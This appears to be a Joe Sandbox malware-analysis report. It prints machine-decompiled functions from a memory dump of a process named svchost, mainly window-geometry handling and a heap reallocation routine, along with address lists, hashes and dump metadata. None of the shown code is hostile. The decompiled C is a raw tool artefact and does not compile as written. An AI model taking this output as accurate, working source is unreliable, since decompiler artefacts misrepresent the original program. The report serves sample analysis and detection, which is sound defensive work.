					if(_t144 == 0) {
						_t146 = E00417F60(__ecx,  *_t215, 0);
						_t176 =  *(_t231 + 0x58);
						_t226 = _t146;
						_t25 = _t215 + 0x18; // 0x18
						_t208 = _t25;
						_t216 = _t208;
						 *((intOrPtr*)(_t231 + 0x5c)) =  *((intOrPtr*)(_t226 + 0x28)) + (_t176 + _t176 * 4) * 4;
						_t217 = _t216 + E0040C020(_t176 + _t176 * 4, _t216);
						_t149 = E0040C020(_t176 + _t176 * 4, _t217);
						_t232 = _t231 + 8;
						_t219 =  *(_t217 + _t149);
						__eflags = _t219;
						if(_t219 == 0) {
							L12:
							_t150 = 0;
							__eflags = 0;
						} else {
							_t185 =  *(_t219 + 0x1c);
							_t168 = IsWindow( *(_t219 + 0x1c));
							__eflags = _t168;
							if(_t168 == 0) {
								goto L12;
							} else {
								_t150 = 1;
							}
						}
						__eflags = _t176 - 8;
						if(_t176 >= 8) {
							__eflags = _t150;
							if(_t150 == 0) {
								E00417E20(0x4ace80, _t150);
							}
							_t151 =  *((intOrPtr*)(_t226 + 0x2c))(6);
							_t177 = _t176 + 0xfffffff8;
							__eflags = _t177;
							 *(_t232 + 0x20) = 0;
							 *((intOrPtr*)(_t232 + 0x2c)) = 0;
							 *_t151(_t219, _t177, _t232 + 0x1c);
							E004194C0( *((intOrPtr*)(_t232 + 0x18)),  *((intOrPtr*)(_t232 + 0x5c)),  *((intOrPtr*)(_t232 + 0x5c)),  *((intOrPtr*)(_t232 + 0x5c)), _t232 + 0x1c, _t232 + 0x14);
							goto L45;
						} else {
							__eflags = _t176 - 7;
							if(_t176 > 7) {
								goto L45;
							} else {
								switch( *((intOrPtr*)(_t176 * 4 +  &M00419000))) {
									case 0:
										__eflags = _t150 - 1;
										if(_t150 != 1) {
											_t211 = _t208 + E0040C020(_t185, _t208);
											_t160 = E0040C020(_t185, _t211);
											_t232 = _t232 + 8;
											__eflags = _t176 - 1;
											_t45 = _t160 + 4; // 0x1c
											_t161 = _t211 + _t45;
											if(_t176 == 1) {
												_t161 = _t161 + 4;
												__eflags = _t161;
											}
											goto L25;
										} else {
											GetWindowRect( *(_t219 + 0x1c), _t232 + 0x1c);
											_t212 = E00484C84(_t226, GetParent( *(_t219 + 0x1c)));
											__eflags = _t212;
											if(_t212 != 0) {
												_t166 = E004874EA(_t219);
												__eflags = _t166 & 0x80000000;
												if((_t166 & 0x80000000) == 0) {
													E00489A84(_t212, _t232 + 0x1c);
												}
											}
											_t156 =  *(_t232 + 0x1c);
											__eflags = _t176;
											if(_t176 != 0) {
												_t156 =  *(_t232 + 0x20);
											}
											 *(_t232 + 0x14) = _t156;
										}
										goto L46;
									case 1:
										__eflags = __eax - 1;
										if(__eax != 1) {
											__edi = __edi + E0040C020(__ecx, __edi);
											__eax = E0040C020(__ecx, __edi);
											__eflags = __ebx - 3;
											_t56 = __eax + 0xc; // 0xc
											__eax = __edi + _t56;
											if(__ebx != 3) {
												L25:
												_t156 =  *_t161;
												 *(_t232 + 0x14) = _t156;
											} else {
												__eax = __eax + 4;
												 *(__esp + 0x14) = __eax;
											}
										} else {
											__ecx =  *(__esi + 0x1c);
											__esp + 0x1c = GetWindowRect( *(__esi + 0x1c), __esp + 0x1c);
											__eflags = __ebx - 2;
											if(__ebx != 2) {
												__eax =  *(__esp + 0x28);
												__ecx =  *(__esp + 0x20);
												__eax =  *(__esp + 0x28) - __ecx;
												 *(__esp + 0x14) =  *(__esp + 0x28) - __ecx;
											} else {
												__eax =  *(__esp + 0x24);
												__ecx =  *(__esp + 0x1c);
												__eax =  *(__esp + 0x24) - __ecx;
												 *(__esp + 0x14) =  *(__esp + 0x24) - __ecx;
											}
										}
										goto L46;
									case 2:
										__edi = __edi + E0040C020(__ecx, __edi);
										__eax = E0040C020(__ecx, __edi);
										__edx =  *(__edi + __eax + 0x1c);
										_t61 = __eax + 0x1c; // 0x1c
										__eax = __edi + _t61;
										__ecx =  *(__eax + 4 + __edx * 4);
										__eax = __ecx + __eax + 4;
										 *(__esp + 0x14) = __eax;
										goto L46;
									case 3:
										__eflags = __eax - 1;
										if(__eax != 1) {
											__edi = __edi + E0040C020(__ecx, __edi);
											__eax = E0040C020(__ecx, __edi);
											__edx =  *(__edi + __eax + 0x1c);
											_t78 = __eax + 0x1c; // 0x1c
											__eax = __edi + _t78;
											__ecx =  *(__eax + 4 + __edx * 4);
											__esi = __ecx + __eax + 4;
											__eax = E0040C020(__ecx, __esi);
											__eax =  *(__eax + __esi + 4);
											 *(__esp + 0x14) = __eax;
										} else {
											__edx =  *(__esi + 0x1c);
											__eax = IsWindowVisible( *(__esi + 0x1c));
											__ecx = 0;
											__eflags = __eax;
											__ecx = 0 | __eax != 0x00000000;
											__eax = __ecx;
											 *(__esp + 0x14) = __ecx;
										}
										goto L46;
									case 4:
										__eflags = __eax - 1;
										if(__eax != 1) {
											__edi = __edi + E0040C020(__ecx, __edi);
											__eax = E0040C020(__ecx, __edi);
											__edx =  *(__edi + __eax + 0x1c);
											_t94 = __eax + 0x1c; // 0x1c
											__eax = __edi + _t94;
											__ecx =  *(__eax + 4 + __edx * 4);
											__esi = __eax + __ecx + 4;
											__eax = E0040C020(__ecx, __esi);
											__eax =  *(__eax + __esi + 4);
											__eax = __eax >> 1;
											 *(__esp + 0x14) = __eax;
										} else {
											__ecx = __esi;
											__eax = E00487648(__ecx);
											__eax =  ~__eax;
											asm("sbb eax, eax");
											 *(__esp + 0x14) = __eax;
										}
										goto L46;
									case 5:
										__edi = __edi + E0040C020(__ecx, __edi);
										__eax = E0040C020(__ecx, __edi);
										__edx =  *(__edi + __eax + 0x1c);
										_t109 = __eax + 0x1c; // 0x1c
										__eax = __edi + _t109;
										__ecx =  *(__eax + 4 + __edx * 4);
										__eax = __eax + 4 + __edx * 4;
										__eflags = __ecx - 4;
										if(__ecx < 4) {
											__eax = __eax + 4;
											_push(__ecx);
											 *(__esp + 0x14) = __eax;
										} else {
											 *(__esp + 0x3c) = 0;
											__ecx =  *__eax;
											__eax = __eax + 4;
											_push(__ecx);
											__ecx = __esp + 0x34;
											__eax = E0040BD00(__esp + 0x34, __eax);
											__esi =  *(__esp + 0x3c);
											__eax =  *(__esp + 0x34);
											__esi =  ~( *(__esp + 0x3c));
											asm("sbb esi, esi");
											__esi =  ~( *(__esp + 0x3c)) &  *(__esp + 0x34);
											__edx =  *__esi;
											 *__esi = E00420180( *__esi);
											__eax =  *(__esp + 0x40);
											_push( *(__esp + 0x40));
											 *(__esp + 0x14) = E00414830(__esi);
										}
										goto L46;
								}
							}
						}
					} else {
						_t222 = _t215 + 0x18;
						_t223 = _t222 + E0040C020(_t183, _t222);
						_t170 = E0040C020(_t183, _t223);
						_t195 =  *(_t231 + 0x60);
						_t232 = _t231 + 8;
						__eflags = _t195 - 3;
						_t17 = _t170 + 8; // -16
						_t171 = _t223 + _t17;
						if(_t195 > 3) {
							L45:
							_t156 =  *(_t232 + 0x14);
						} else {
							switch( *((intOrPtr*)(_t195 * 4 +  &M00418FF0))) {
								case 0:
									_t156 = E004147A0(_t195, _t171 + 4);
									_t232 = _t232 + 4;
									 *(_t232 + 0x14) = _t156;
									goto L46;
								case 1:
									__eax =  *__eax;
									__eax = __eax >> 2;
									 *(__esp + 0x14) = __eax;
									goto L46;
								case 2:
									__eax =  *__eax;
									__eax = __eax >> 1;
									 *(__esp + 0x14) = __eax;
									goto L46;
								case 3:
									__eax =  *__eax;
									__eax =  !__eax;
									 *(__esp + 0x14) = __eax;
									goto L46;
							}
						}
					}
					L46:
					 *((intOrPtr*)(_t232 + 0x48)) = 0xffffffff;
					 *((intOrPtr*)(_t232 + 0x2c)) = 0x495e50;
					E0040B7D0(_t232 + 0x2c);
					 *[fs:0x0] =  *((intOrPtr*)(_t232 + 0x40));
					return _t156;
				} else {
					E00417E20(0x4ace94, 0);
					 *[fs:0x0] =  *((intOrPtr*)(_t230 + 0x30));
					return  *((intOrPtr*)(_t230 + 0xc));
				}
			}




























    0x00418ba0
    0x00418ba2
    0x00418bad
    0x00418bae
    0x00418bb5
    0x00418bcf
    0x00418bd3
    0x00418bd7
    0x00418be2
    0x00418c1c
    0x00418c21
    0x00418c25
    0x00418c27
    0x00418c2d
    0x00418c31
    0x00418c36
    0x00418c39
    0x00418c3b
    0x00418cb5
    0x00418cba
    0x00418cbe
    0x00418cc0
    0x00418cc0
    0x00418cc9
    0x00418ccf
    0x00418cd8
    0x00418cdb
    0x00418ce2
    0x00418ce5
    0x00418ce7
    0x00418ce9
    0x00418d00
    0x00418d00
    0x00418d00
    0x00418ceb
    0x00418ceb
    0x00418cef
    0x00418cf5
    0x00418cf7
    0x00000000
    0x00418cf9
    0x00418cf9
    0x00418cf9
    0x00418cf7
    0x00418d02
    0x00418d05
    0x00418f67
    0x00418f69
    0x00418f75
    0x00418f75
    0x00418f7c
    0x00418f85
    0x00418f85
    0x00418f89
    0x00418f8f
    0x00418f93
    0x00418fad
    0x00000000
    0x00418d0b
    0x00418d0b
    0x00418d0e
    0x00000000
    0x00418d14
    0x00418d14
    0x00000000
    0x00418d1b
    0x00418d1e
    0x00418d7a
    0x00418d7d
    0x00418d82
    0x00418d85
    0x00418d88
    0x00418d88
    0x00418d8c
    0x00418d8e
    0x00418d8e
    0x00418d8e
    0x00000000
    0x00418d20
    0x00418d29
    0x00418d3f
    0x00418d41
    0x00418d43
    0x00418d47
    0x00418d4c
    0x00418d51
    0x00418d5a
    0x00418d5a
    0x00418d51
    0x00418d5f
    0x00418d63
    0x00418d65
    0x00418d67
    0x00418d67
    0x00418d6b
    0x00418d6b
    0x00000000
    0x00000000
    0x00418d9c
    0x00418d9f
    0x00418de1
    0x00418de4
    0x00418dec
    0x00418def
    0x00418def
    0x00418df3
    0x00418d91
    0x00418d91
    0x00418d93
    0x00418df5
    0x00418df5
    0x00418dfa
    0x00418dfa
    0x00418da1
    0x00418da1
    0x00418daa
    0x00418db0
    0x00418db3
    0x00418dc8
    0x00418dcc
    0x00418dd0
    0x00418dd2
    0x00418db5
    0x00418db5
    0x00418db9
    0x00418dbd
    0x00418dbf
    0x00418dbf
    0x00418db3
    0x00000000
    0x00000000
    0x00418e09
    0x00418e0c
    0x00418e11
    0x00418e15
    0x00418e15
    0x00418e19
    0x00418e21
    0x00418e2e
    0x00000000
    0x00000000
    0x00418e37
    0x00418e3a
    0x00418e5e
    0x00418e61
    0x00418e66
    0x00418e6a
    0x00418e6a
    0x00418e6e
    0x00418e76
    0x00418e7b
    0x00418e80
    0x00418e8a
    0x00418e3c
    0x00418e3c
    0x00418e40
    0x00418e46
    0x00418e48
    0x00418e4a
    0x00418e4d
    0x00418e4f
    0x00418e4f
    0x00000000
    0x00000000
    0x00418e93
    0x00418e96
    0x00418eb3
    0x00418eb6
    0x00418ebb
    0x00418ebf
    0x00418ebf
    0x00418ec3
    0x00418ecb
    0x00418ed0
    0x00418ed5
    0x00418edc
    0x00418ee1
    0x00418e98
    0x00418e98
    0x00418e9a
    0x00418e9f
    0x00418ea1
    0x00418ea4
    0x00418ea4
    0x00000000
    0x00000000
    0x00418ef0
    0x00418ef3
    0x00418ef8
    0x00418efc
    0x00418efc
    0x00418f03
    0x00418f07
    0x00418f0b
    0x00418f0e
    0x00418f54
    0x00418f57
    0x00418f61
    0x00418f10
    0x00418f10
    0x00418f18
    0x00418f1a
    0x00418f1d
    0x00418f1f
    0x00418f23
    0x00418f28
    0x00418f2c
    0x00418f30
    0x00418f32
    0x00418f34
    0x00418f36
    0x00418f3e
    0x00418f40
    0x00418f44
    0x00418f4e
    0x00418f4e
    0x00000000
    0x00000000
    0x00418d14
    0x00418d0e
    0x00418c3d
    0x00418c3d
    0x00418c46
    0x00418c49
    0x00418c4e
    0x00418c52
    0x00418c55
    0x00418c58
    0x00418c58
    0x00418c5c
    0x00418fb2
    0x00418fb2
    0x00418c62
    0x00418c62
    0x00000000
    0x00418c6d
    0x00418c72
    0x00418c75
    0x00000000
    0x00000000
    0x00418c7e
    0x00418c80
    0x00418c86
    0x00000000
    0x00000000
    0x00418c8f
    0x00418c91
    0x00418c96
    0x00000000
    0x00000000
    0x00418c9f
    0x00418ca1
    0x00418ca6
    0x00000000
    0x00000000
    0x00418c62
    0x00418c5c
    0x00418fb6
    0x00418fc0
    0x00418fc8
    0x00418fd0
    0x00418fe1
    0x00418feb
    0x00418be4
    0x00418bec
    0x00418bff
    0x00418c09
    0x00418c09

    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: d1396680eb312b65d1212cfa43dfceb587bc841e1f4ac143ad28e0d37578becc
    • Instruction ID: 4e0cd58cf15c4c090ff505e9b242d246e933eceb0b0d7a050c024b70f2525f2e
    • Opcode Fuzzy Hash: d1396680eb312b65d1212cfa43dfceb587bc841e1f4ac143ad28e0d37578becc
    • Instruction Fuzzy Hash: F8C1B171504306AFC710DF24D8819ABB3E9EFD4708F14492EF845A7341EB38E946CBAA
    Uniqueness

    Uniqueness Score: -1.00%

    Function 004727BB Relevance: 7.8, APIs: 5, Instructions: 278COMMON
    Download Yara Rule
    C-Code - Quality: 68%
    			E004727BB(void* _a4, long _a8) {
				signed int _v8;
				intOrPtr _v20;
				long _v36;
				void* _v40;
				intOrPtr _v44;
				char _v48;
				long _v52;
				long _v56;
				char _v60;
				intOrPtr _t56;
				void* _t57;
				long _t58;
				long _t59;
				long _t63;
				long _t66;
				long _t68;
				long _t71;
				long _t72;
				long _t74;
				long _t78;
				intOrPtr _t80;
				void* _t83;
				long _t85;
				long _t88;
				void* _t89;
				long _t91;
				intOrPtr _t93;
				void* _t97;
				void* _t104;
				long _t113;
				long _t116;
				intOrPtr _t122;
				void* _t123;

				_push(0xffffffff);
				_push(0x49d760);
				_push(E00472CF4);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t122;
				_t123 = _t122 - 0x28;
				_t97 = _a4;
				_t113 = 0;
				if(_t97 != 0) {
					_t116 = _a8;
					__eflags = _t116;
					if(_t116 != 0) {
						_t56 =  *0x4e1c8c; // 0x1
						__eflags = _t56 - 3;
						if(_t56 != 3) {
							__eflags = _t56 - 2;
							if(_t56 != 2) {
								while(1) {
									_t57 = 0;
									__eflags = _t116 - 0xffffffe0;
									if(_t116 <= 0xffffffe0) {
										__eflags = _t116 - _t113;
										if(_t116 == _t113) {
											_t116 = 1;
										}
										_t116 = _t116 + 0x0000000f & 0xfffffff0;
										__eflags = _t116;
										_t57 = RtlReAllocateHeap( *0x4e1c88, _t113, _t97, _t116);
									}
									__eflags = _t57 - _t113;
									if(_t57 != _t113) {
										goto L64;
									}
									__eflags =  *0x4e19b0 - _t113; // 0x0
									if(__eflags == 0) {
										goto L64;
									}
									_t58 = E00479929(_t116);
									__eflags = _t58;
									if(_t58 != 0) {
										continue;
									}
									goto L63;
								}
								goto L64;
							}
							__eflags = _t116 - 0xffffffe0;
							if(_t116 <= 0xffffffe0) {
								__eflags = _t116;
								if(_t116 <= 0) {
									_t116 = 0x10;
								} else {
									_t116 = _t116 + 0x0000000f & 0xfffffff0;
								}
								_a8 = _t116;
							}
							while(1) {
								_v40 = _t113;
								__eflags = _t116 - 0xffffffe0;
								if(_t116 <= 0xffffffe0) {
									E004774D4(9);
									_pop(_t104);
									_v8 = 1;
									_t63 = E004794B8(_t97,  &_v60,  &_v48);
									_t123 = _t123 + 0xc;
									_t113 = _t63;
									_v52 = _t113;
									__eflags = _t113;
									if(_t113 == 0) {
										_v40 = RtlReAllocateHeap( *0x4e1c88, 0, _t97, _t116);
									} else {
										__eflags = _t116 -  *0x4bc034; // 0x1e0
										if(__eflags < 0) {
											_t100 = _t116 >> 4;
											_t71 = E00479880(_t104, _v60, _v48, _t113, _t116 >> 4);
											_t123 = _t123 + 0x10;
											__eflags = _t71;
											if(_t71 == 0) {
												_t72 = E00479554(_t104, _t100);
												_v40 = _t72;
												__eflags = _t72;
												if(_t72 != 0) {
													_t74 = ( *_t113 & 0x000000ff) << 4;
													_v56 = _t74;
													__eflags = _t74 - _t116;
													if(_t74 >= _t116) {
														_t74 = _t116;
													}
													E00472FB0(_v40, _a4, _t74);
													E0047950F(_v60, _v48, _t113);
													_t123 = _t123 + 0x18;
												}
											} else {
												_v40 = _a4;
											}
											_t97 = _a4;
										}
										__eflags = _v40;
										if(_v40 == 0) {
											_t66 = RtlAllocateHeap( *0x4e1c88, 0, _t116);
											_v40 = _t66;
											__eflags = _t66;
											if(_t66 != 0) {
												_t68 = ( *_t113 & 0x000000ff) << 4;
												_v56 = _t68;
												__eflags = _t68 - _t116;
												if(_t68 >= _t116) {
													_t68 = _t116;
												}
												E00472FB0(_v40, _t97, _t68);
												E0047950F(_v60, _v48, _t113);
												_t123 = _t123 + 0x18;
											}
										}
									}
									_t51 =  &_v8;
									 *_t51 = _v8 | 0xffffffff;
									__eflags =  *_t51;
									E00472A94();
								}
								_t57 = _v40;
								__eflags = _t57 - _t113;
								if(_t57 != _t113) {
									goto L64;
								}
								__eflags =  *0x4e19b0 - _t113; // 0x0
								if(__eflags == 0) {
									goto L64;
								}
								_t59 = E00479929(_t116);
								__eflags = _t59;
								if(_t59 != 0) {
									continue;
								}
								goto L63;
							}
							goto L64;
						} else {
							goto L5;
						}
						do {
							L5:
							_v40 = _t113;
							__eflags = _t116 - 0xffffffe0;
							if(_t116 > 0xffffffe0) {
								L25:
								_t57 = _v40;
								__eflags = _t57 - _t113;
								if(_t57 != _t113) {
									goto L64;
								}
								__eflags =  *0x4e19b0 - _t113; // 0x0
								if(__eflags == 0) {
									goto L64;
								}
								goto L27;
							}
							E004774D4(9);
							_v8 = _t113;
							_t80 = E0047875D(_t97);
							_v44 = _t80;
							__eflags = _t80 - _t113;
							if(_t80 == _t113) {
								L21:
								_v8 = _v8 | 0xffffffff;
								E00472946();
								__eflags = _v44 - _t113;
								if(_v44 == _t113) {
									__eflags = _t116 - _t113;
									if(_t116 == _t113) {
										_t116 = 1;
									}
									_t116 = _t116 + 0x0000000f & 0xfffffff0;
									__eflags = _t116;
									_a8 = _t116;
									_v40 = RtlReAllocateHeap( *0x4e1c88, _t113, _t97, _t116);
								}
								goto L25;
							}
							__eflags = _t116 -  *0x4e1c84; // 0x0
							if(__eflags <= 0) {
								_push(_t116);
								_push(_t97);
								_push(_t80);
								_t88 = E00478F66();
								_t123 = _t123 + 0xc;
								__eflags = _t88;
								if(_t88 == 0) {
									_push(_t116);
									_t89 = E00478AB1();
									_v40 = _t89;
									__eflags = _t89 - _t113;
									if(_t89 != _t113) {
										_t91 =  *((intOrPtr*)(_t97 - 4)) - 1;
										_v36 = _t91;
										__eflags = _t91 - _t116;
										if(_t91 >= _t116) {
											_t91 = _t116;
										}
										E00472FB0(_v40, _t97, _t91);
										_t93 = E0047875D(_t97);
										_v44 = _t93;
										_push(_t97);
										_push(_t93);
										E00478788();
										_t123 = _t123 + 0x18;
									}
								} else {
									_v40 = _t97;
								}
							}
							__eflags = _v40 - _t113;
							if(_v40 == _t113) {
								__eflags = _t116 - _t113;
								if(_t116 == _t113) {
									_t116 = 1;
									_a8 = _t116;
								}
								_t116 = _t116 + 0x0000000f & 0xfffffff0;
								_a8 = _t116;
								_t83 = RtlAllocateHeap( *0x4e1c88, _t113, _t116);
								_v40 = _t83;
								__eflags = _t83 - _t113;
								if(_t83 != _t113) {
									_t85 =  *((intOrPtr*)(_t97 - 4)) - 1;
									_v36 = _t85;
									__eflags = _t85 - _t116;
									if(_t85 >= _t116) {
										_t85 = _t116;
									}
									E00472FB0(_v40, _t97, _t85);
									_push(_t97);
									_push(_v44);
									E00478788();
									_t123 = _t123 + 0x14;
								}
							}
							goto L21;
							L27:
							_t78 = E00479929(_t116);
							__eflags = _t78;
						} while (_t78 != 0);
						goto L63;
					} else {
						E004715AE(_t97);
						L63:
						_t57 = 0;
						__eflags = 0;
						goto L64;
					}
				} else {
					_t57 = E00471697(_a8);
					L64:
					 *[fs:0x0] = _v20;
					return _t57;
				}
			}




































    0x004727be
    0x004727c0
    0x004727c5
    0x004727d0
    0x004727d1
    0x004727d8
    0x004727de
    0x004727e1
    0x004727e5
    0x004727f5
    0x004727f8
    0x004727fa
    0x00472808
    0x0047280d
    0x00472810
    0x0047294f
    0x00472952
    0x00472a9f
    0x00472a9f
    0x00472aa1
    0x00472aa4
    0x00472aa6
    0x00472aa8
    0x00472aac
    0x00472aac
    0x00472ab0
    0x00472ab0
    0x00472abc
    0x00472abc
    0x00472ac2
    0x00472ac4
    0x00000000
    0x00000000
    0x00472ac6
    0x00472acc
    0x00000000
    0x00000000
    0x00472acf
    0x00472ad5
    0x00472ad7
    0x00000000
    0x00000000
    0x00000000
    0x00472ad7
    0x00000000
    0x00472a9f
    0x00472958
    0x0047295b
    0x0047295d
    0x0047295f
    0x0047296b
    0x00472961
    0x00472964
    0x00472964
    0x0047296c
    0x0047296c
    0x0047296f
    0x0047296f
    0x00472972
    0x00472975
    0x0047297d
    0x00472982
    0x00472983
    0x00472993
    0x00472998
    0x0047299b
    0x0047299d
    0x004729a0
    0x004729a2
    0x00472a62
    0x004729a8
    0x004729a8
    0x004729ae
    0x004729b2
    0x004729bd
    0x004729c2
    0x004729c5
    0x004729c7
    0x004729d2
    0x004729d8
    0x004729db
    0x004729dd
    0x004729e2
    0x004729e5
    0x004729e8
    0x004729ea
    0x004729ec
    0x004729ec
    0x004729f5
    0x00472a01
    0x00472a06
    0x00472a06
    0x004729c9
    0x004729cc
    0x004729cc
    0x00472a09
    0x00472a09
    0x00472a0c
    0x00472a10
    0x00472a1b
    0x00472a21
    0x00472a24
    0x00472a26
    0x00472a2b
    0x00472a2e
    0x00472a31
    0x00472a33
    0x00472a35
    0x00472a35
    0x00472a3c
    0x00472a48
    0x00472a4d
    0x00472a4d
    0x00472a26
    0x00472a10
    0x00472a65
    0x00472a65
    0x00472a65
    0x00472a69
    0x00472a69
    0x00472a6e
    0x00472a71
    0x00472a73
    0x00000000
    0x00000000
    0x00472a75
    0x00472a7b
    0x00000000
    0x00000000
    0x00472a7e
    0x00472a84
    0x00472a86
    0x00000000
    0x00000000
    0x00000000
    0x00472a8c
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00472816
    0x00472816
    0x00472816
    0x00472819
    0x0047281c
    0x00472913
    0x00472913
    0x00472916
    0x00472918
    0x00000000
    0x00000000
    0x0047291e
    0x00472924
    0x00000000
    0x00000000
    0x00000000
    0x00472924
    0x00472824
    0x0047282a
    0x0047282e
    0x00472834
    0x00472837
    0x00472839
    0x004728e3
    0x004728e3
    0x004728e7
    0x004728ec
    0x004728ef
    0x004728f1
    0x004728f3
    0x004728f7
    0x004728f7
    0x004728fb
    0x004728fb
    0x004728fe
    0x00472910
    0x00472910
    0x00000000
    0x004728ef
    0x0047283f
    0x00472845
    0x00472847
    0x00472848
    0x00472849
    0x0047284a
    0x0047284f
    0x00472852
    0x00472854
    0x0047285b
    0x0047285c
    0x00472862
    0x00472865
    0x00472867
    0x0047286c
    0x0047286d
    0x00472870
    0x00472872
    0x00472874
    0x00472874
    0x0047287b
    0x00472881
    0x00472886
    0x00472889
    0x0047288a
    0x0047288b
    0x00472890
    0x00472890
    0x00472856
    0x00472856
    0x00472856
    0x00472854
    0x00472893
    0x00472896
    0x00472898
    0x0047289a
    0x0047289e
    0x0047289f
    0x0047289f
    0x004728a5
    0x004728a8
    0x004728b3
    0x004728b9
    0x004728bc
    0x004728be
    0x004728c3
    0x004728c4
    0x004728c7
    0x004728c9
    0x004728cb
    0x004728cb
    0x004728d2
    0x004728d7
    0x004728d8
    0x004728db
    0x004728e0
    0x004728e0
    0x004728be
    0x00000000
    0x0047292a
    0x0047292b
    0x00472931
    0x00472931
    0x00000000
    0x004727fc
    0x004727fd
    0x00472ad9
    0x00472ad9
    0x00472ad9
    0x00000000
    0x00472ad9
    0x004727e7
    0x004727ea
    0x00472adb
    0x00472ade
    0x00472ae9
    0x00472ae9

    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: c95a0453f2a886db02d7feddd7a33b19040cab5039f7dd0c374fb453815813c8
    • Instruction ID: d18b9b9894df037fe9f47e1def08ea6c3c2202dc05b00bb2e19c3581c3484842
    • Opcode Fuzzy Hash: c95a0453f2a886db02d7feddd7a33b19040cab5039f7dd0c374fb453815813c8
    • Instruction Fuzzy Hash: D491F9B1D00114AFDF21AB69CE849DE7BB4EB44364F24C62BF81CB6291E7B94D40876D
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0041EA90 Relevance: 7.7, APIs: 5, Instructions: 196windowCOMMON
    Download Yara Rule
    C-Code - Quality: 96%
    			E0041EA90(intOrPtr __ecx) {
				void* __esi;
				intOrPtr _t60;
				intOrPtr _t71;
				intOrPtr _t78;
				void* _t85;
				void* _t87;
				signed int _t92;
				intOrPtr _t96;
				signed int _t100;
				signed int _t103;
				intOrPtr _t139;
				void* _t142;
				intOrPtr _t146;
				void* _t150;
				intOrPtr* _t151;
				void* _t152;
				void* _t153;
				intOrPtr _t155;
				intOrPtr _t157;
				intOrPtr _t161;
				void* _t162;

				_push(0xffffffff);
				_push(E0048EA20);
				_t60 =  *[fs:0x0];
				_push(_t60);
				 *[fs:0x0] = _t161;
				_t162 = _t161 - 0x40;
				_t157 = __ecx;
				_t96 = 0;
				 *((intOrPtr*)(_t162 + 8)) = __ecx;
				_t164 =  *((intOrPtr*)(__ecx + 0x1e0));
				if( *((intOrPtr*)(__ecx + 0x1e0)) == 0) {
					L23:
					 *[fs:0x0] =  *((intOrPtr*)(_t162 + 0x48));
					return _t60;
				}
				E0040B5D0(_t162 + 0x3c);
				 *((intOrPtr*)(_t162 + 0x3c)) = 0x496394;
				 *((intOrPtr*)(_t162 + 0x58)) = 0;
				E0040B5D0(_t162 + 0x28);
				 *((intOrPtr*)(_t162 + 0x28)) = 0x496394;
				 *((char*)(_t162 + 0x64)) = 1;
				if(E00413AB0(E00418A40(0x3e9, 0, 0), _t164,  *((intOrPtr*)(_t157 + 0xdc)), _t162 + 0x14, 0) != 1) {
					L13:
					_t146 = 0;
					_t100 = ( *(_t162 + 0x4c) >> 2) - 1;
					__eflags = _t100;
					if(_t100 < 0) {
						L18:
						GetClientRect( *(_t157 + 0x1c), _t162 + 0x18);
						_t139 =  *((intOrPtr*)(_t162 + 0x24));
						_t103 = ( *(_t162 + 0x38) >> 2) - 1;
						__eflags = _t103;
						if(_t103 < 0) {
							L22:
							 *((char*)(_t162 + 0x58)) = 0;
							 *((intOrPtr*)(_t162 + 0x28)) = 0x4962b0;
							E0040B7D0(_t162 + 0x28);
							 *((intOrPtr*)(_t162 + 0x58)) = 0xffffffff;
							 *((intOrPtr*)(_t162 + 0x3c)) = 0x4962b0;
							_t60 = E0040B7D0(_t162 + 0x3c);
							goto L23;
						} else {
							goto L19;
						}
						do {
							L19:
							_t159 =  *((intOrPtr*)( *((intOrPtr*)(_t162 + 0x30)) + _t103 * 4));
							GetWindowRect( *( *((intOrPtr*)( *((intOrPtr*)(_t162 + 0x30)) + _t103 * 4)) + 0x1c), _t162 + 0x18);
